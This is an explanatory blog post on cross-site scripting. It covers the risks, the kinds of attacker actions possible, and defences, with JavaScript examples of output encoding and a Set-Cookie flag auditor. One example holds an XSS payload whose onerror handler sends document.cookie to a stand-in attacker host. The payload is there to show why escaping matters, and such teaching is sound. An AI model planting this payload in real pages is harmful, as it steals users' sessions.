Why is an XSS attack dangerous and what don't you know about it?

What is XSS?

Cross-site Scripting (XSS) is a client-side code injection attack. The attacker's goal is to execute malicious script in the victim's web browser by getting that script into a page served by a legitimate website or web application, so that it runs with the trusted site's origin and privileges.

The flaws that allow these attacks to succeed are very common. They occur wherever a web application takes user input and places it in the output it generates without validating, encoding or sanitising that input first.

Sometimes even software engineers underestimate how dangerous this is, on the grounds that the injected code only runs on the client side and never executes on the server.

Today most applications are SPAs, PWAs or MPAs. A lot is going on in the front end, so it is worth keeping security in mind there too!
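
To make the flaw concrete, here is an added example (my own code, not part of the original post) in Node-runnable JavaScript: a comment template rendered once with raw user input and once with the input encoded for the HTML body context, plus a constructed payload and a crude check that shows whether a tag the template never wrote made it into the output. The hostname attacker.example is a placeholder.

```javascript
// Added example, not the post's code: the same comment template rendered once
// with raw user input (the flaw) and once with output encoding (the fix).
// The payload is constructed for illustration.

// Encoder for the HTML *body* context. Attribute, URL and JavaScript contexts
// need their own encoders; see the OWASP XSS Prevention Cheat Sheet.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function escapeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// VULNERABLE: user-controlled strings are interpolated straight into markup.
function renderCommentVulnerable(author, text) {
  return `<div class="comment"><b>${author}</b>: ${text}</div>`;
}

// HARDENED: every untrusted value is encoded for the context it lands in.
function renderCommentSafe(author, text) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(text)}</div>`;
}

// Crude check used only to make the difference visible: did any tag other than
// the ones the template itself wrote end up in the output?
const TEMPLATE_TAGS = new Set(['div', 'b']);
function containsForeignTag(html) {
  const names = [...html.matchAll(/<\/?([a-zA-Z][\w-]*)/g)].map((m) => m[1].toLowerCase());
  return names.some((t) => !TEMPLATE_TAGS.has(t));
}

// Constructed payload: an image that never loads, so its onerror handler fires
// and ships the page's cookies to a host the attacker controls (placeholder name).
const PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

console.log(renderCommentVulnerable('mallory', PAYLOAD)); // payload intact: runs in the victim's browser
console.log(renderCommentSafe('mallory', PAYLOAD));       // payload shown as harmless text
console.log(containsForeignTag(renderCommentVulnerable('mallory', PAYLOAD))); // true
console.log(containsForeignTag(renderCommentSafe('mallory', PAYLOAD)));       // false
```

In the browser the same distinction shows up as DOM sinks: `element.innerHTML = text` is the vulnerable assignment, `element.textContent = text` is the safe one. Note that `escapeHtml` only covers the HTML body; a value placed inside an attribute, a URL or a script block needs the encoder for that context, which is exactly what template engines that escape by default do for you.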

Why can an XSS attack be dangerous?

In my opinion, this type of attack is dangerous for at least three reasons. The first is that it takes only a few lines of code and a little knowledge of JS to launch one. The second is that the injection is hard to detect from the server side: the whole attack plays out in the victim's browser, carried by text, images, forms or a URL, and in DOM-based variants the payload never even reaches the server. This is where things start to get complicated, and the attack can cause a lot of confusion in the application. The third reason? Such an attack is rarely a single step; it is a chain of small victories, each one used to reach for more.

What can be done with such an attack?

A lot can be done with such an attack, from simple things like clickjacking (the victim clicks on a hidden overlay injected into the page) to changing account numbers in a form or stealing sessions and cookies. More examples:

  1. Inject advertising code into the page and make money from it.
  2. Read the content of the page with JavaScript and simply replace it.
  3. Trigger file downloads without the victim clicking anything.
  4. Use the victim's CPU to mine cryptocurrency (cryptojacking).
  5. Log the keys the victim presses.
  6. Take screenshots of the page.
  7. Take pictures with the camera.
  8. Redirect the victim to other sites.
  9. Steal information from the page and send it to the attacker's server.
  10. Record sound from the microphone.
  11. Learn the victim's location.

Items 7, 10 and 11 are gated by browser permissions: the injected script inherits whatever the victim has already granted to the site (camera, microphone, geolocation) and otherwise triggers a permission prompt that appears to come from the trusted site. Everything else works silently, because the script runs with the same origin as the legitimate page.

How do you protect yourself?

A good first step is to limit the amount of information collected from the user, so that there are fewer inputs and components that we have to remember to protect against such an attack.

Solutions and defence options against such an attack can be found here: cheatsheetseries.owasp.org/cheatsheets/Cros..

It is worth taking care of at least the cookies: set the HttpOnly flag on session cookies (via the Set-Cookie header).

The HttpOnly flag tells the browser to hide the cookie from non-HTTP APIs, so a script running in the page, injected or not, cannot read it through document.cookie. The caveat is that an attacker can still act with the victim's session from inside the page while the script runs; what HttpOnly prevents is carrying the cookie off to reuse it later.

Prepared statements protect you against SQL injection, not XSS. The equivalent for XSS is encoding every piece of user-supplied data for the context it is output into (HTML body, attribute, JavaScript, URL), ideally through a template engine that escapes by default, combined with validating input on the way in. Keeping your software, frameworks and libraries up to date also helps improve the security of your application.
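
As an added example (my own code, not from the original post), here is a small Set-Cookie auditor in Node-runnable JavaScript. It reports which hardening flags a cookie is missing and simulates the browser rule just described, namely that document.cookie never exposes cookies set with HttpOnly. All header values are constructed and `sessionCookie` is a hypothetical helper showing how a session cookie should be issued.

```javascript
// Added example, not the post's code: audit Set-Cookie header values for the
// flags a session cookie should carry. All header strings here are constructed.

const REQUIRED_FLAGS = ['httponly', 'secure', 'samesite'];

// Parse a single Set-Cookie header value into its name, value and attributes
// (attribute names lower-cased; bare flags such as HttpOnly become `true`).
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((p) => p.trim());
  const eq = pair.indexOf('=');
  const attrs = {};
  for (const part of rest) {
    if (!part) continue;
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1);
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs };
}

// Which hardening flags is this cookie missing? An empty array means it is fine.
function missingFlags(header) {
  const { attrs } = parseSetCookie(header);
  const missing = REQUIRED_FLAGS.filter((f) => !(f in attrs));
  // SameSite=None is only accepted by browsers together with Secure.
  if (String(attrs.samesite).toLowerCase() === 'none' && !('secure' in attrs)) {
    missing.push('secure');
  }
  return [...new Set(missing)];
}

// Simulation of the browser rule the post describes: document.cookie never
// returns cookies that were set with HttpOnly.
function visibleToScript(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !('httponly' in c.attrs))
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Hypothetical helper: how a session cookie should be issued.
function sessionCookie(name, value) {
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample: one weak legacy cookie, one hardened session cookie and
// one preference cookie that script is meant to read.
const SAMPLE_HEADERS = [
  'legacy_sid=abc123; Path=/',
  sessionCookie('sid', 'c0ffee42'),
  'theme=dark; Path=/; SameSite=Lax',
];

for (const h of SAMPLE_HEADERS) {
  const missing = missingFlags(h);
  console.log(`${parseSetCookie(h).name}: ${missing.length ? 'missing ' + missing.join(', ') : 'ok'}`);
}
console.log('document.cookie would show:', visibleToScript(SAMPLE_HEADERS));
```

The auditor treats every cookie the same, so it also flags the `theme` cookie; that is deliberate, since the decision about which cookies may legitimately stay readable by script is one you should make per cookie, and anything that identifies a session belongs in the HttpOnly group.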

If you are a developer have a look here: crashtest-security.com/xss-attack-prevention

Summary

Before implementing and developing software, it is worth considering its security. This aspect is still overlooked, as the attacks on eBay, Facebook and British Airways show. XSS vulnerabilities vary and pose different risks to your organisation, applications and users. When your website or application is hit by XSS, the attacker can steal sensitive data, perform unauthorised actions on the user's behalf, elevate their privileges or take over a user's active web session.